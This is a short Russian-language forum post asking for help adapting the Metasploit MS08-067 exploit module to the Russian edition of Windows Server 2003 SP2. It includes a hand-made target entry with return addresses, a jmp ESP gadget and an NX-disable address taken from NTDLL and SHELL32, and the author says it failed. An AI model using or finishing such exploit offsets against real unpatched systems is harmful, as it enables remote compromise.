Изучаю работу эксплоита MS08-067 для Metasploit.
Проблема в том, что приведенный модуль не предназначен для русскоязычной версии Windows Server 2003 SP2.
Взял дизассемблер, и, поглядывая на английскую версию NTDLL и SHELL32, немного подправил код:
Не прокатило. Есть мысли по этому поводу?Code:['Windows 2003 SP2 Russian (NX)', { 'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL 'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL 'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL 'DisableNX' => 0x7c94F517, # NX disable @NTDLL.DLL 'Scratch' => 0x00020408, } ],



Reply With Quote
Thanks